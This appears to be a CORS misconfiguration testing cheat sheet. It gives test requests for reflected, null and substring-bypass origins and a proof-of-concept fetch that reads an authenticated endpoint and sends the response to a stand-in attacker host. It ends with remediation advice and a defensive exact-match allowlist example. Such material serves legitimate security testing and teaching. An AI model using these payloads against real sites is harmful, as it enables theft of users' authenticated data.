Learn how to find and exploit CORS misconfigurations — reflected origins, null origin, weak regex, and credentialed cross-origin reads — with a step-by-step methodology and ready-to-use test requests.
Identify API endpoints that return sensitive data and inspect their CORS response headers. Send a request with an Origin header and look at Access-Control-Allow-Origin (ACAO) and Access-Control-Allow-Credentials (ACAC) in the response.
Origin: https://attacker.com
curl -s -o /dev/null -D - -H "Origin: https://attacker.com" https://target.com/api/me
(sends a real GET and dumps only the response headers; a HEAD request via -I may be handled differently and can miss the CORS headers the GET path sets)
Look for: Access-Control-Allow-Origin: https://attacker.com + Access-Control-Allow-Credentials: true
The most common flaw: the server reflects whatever Origin you send into ACAO. Combined with ACAC: true, any site can read authenticated responses. Send an unrelated origin and check whether it is echoed back.
Origin: https://evil.example
Origin: https://attacker.com
Vulnerable if response has: Access-Control-Allow-Origin: <your origin>
Sandboxed iframes, redirects, and data: URLs send Origin: null. Many allowlists include null, which an attacker can force from a sandboxed iframe. Check whether null is trusted.
Origin: null
<iframe sandbox="allow-scripts allow-forms" srcdoc="<script>/* fetch target */</script>">
Vulnerable if response has: Access-Control-Allow-Origin: null
Allowlists built with sloppy string matching can be tricked by prefix/suffix tricks or attacker-controlled subdomains. Test origins that contain the trusted domain as a substring.
Origin: https://target.com.attacker.com
Origin: https://attacker-target.com
Origin: https://target.com.evil.net
Origin: https://evil.target.com (if subdomains are trusted and one is takeover-able)
A reflected origin only matters if credentials are allowed. Build a proof-of-concept page that performs a credentialed fetch and exfiltrates the response. Without ACAC: true, the browser blocks reading the body even if ACAO reflects.
fetch('https://target.com/api/me', { credentials: 'include' }).then(r => r.text()).then(d => fetch('https://attacker.com/log?d=' + encodeURIComponent(d)))
Confirm the response body is readable cross-origin (not just sent).
Record the vulnerable endpoint, the accepted origin pattern, whether credentials are reflected, and the data exposed. Recommend an explicit origin allowlist (no reflection, no null, exact-match), and decoupling ACAC from untrusted origins.
Document: endpoint, ACAO behavior, ACAC value, data exposed, PoC URL.
Fix: exact-match allowlist; never reflect Origin; never combine wildcard/null with credentials.
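To make the fix concrete, here is an added example (not code from the original cheat sheet) of an exact-match origin allowlist next to the sloppy substring check it replaces, run against the bypass origins listed above; the allowlist entries and host names are assumed for illustration.

```javascript
// Added example: exact-match CORS origin allowlist vs. a weak substring check.
// Allowlist entries are assumed placeholders, not a real deployment.
const ALLOWED_ORIGINS = new Set([
  'https://target.com',
  'https://app.target.com',
]);

// Weak check: substring matching, defeated by every bypass origin on the page.
function weakOriginCheck(origin) {
  return typeof origin === 'string' && origin.includes('target.com');
}

// Hardened check: parse the Origin header and compare the serialized origin
// (scheme + host + port) exactly. 'null' and malformed values never match.
function isAllowedOrigin(origin) {
  if (typeof origin !== 'string' || origin === 'null') return false;
  let url;
  try { url = new URL(origin); } catch { return false; }
  if (url.origin !== origin) return false; // rejects paths, trailing slashes, odd forms
  return ALLOWED_ORIGINS.has(url.origin);
}

// CORS response headers: credentials are only granted together with an
// exact-matched origin, never with '*' or 'null'; unknown origins get no ACAO.
function corsHeaders(origin) {
  if (!isAllowedOrigin(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // stops caches replaying one origin's ACAO to another
  };
}

// Probe set: the legitimate origin plus the bypass origins from the page.
const PROBES = [
  'https://target.com',
  'https://attacker.com',
  'null',
  'https://target.com.attacker.com',
  'https://attacker-target.com',
  'https://evil.target.com',
];

// Returns, per probe, what each check decides so the difference is visible.
function auditProbes() {
  return PROBES.map(o => ({ origin: o, weak: weakOriginCheck(o), hardened: isAllowedOrigin(o) }));
}
```

Only the first probe should pass the hardened check; the weak check also accepts the three substring bypasses.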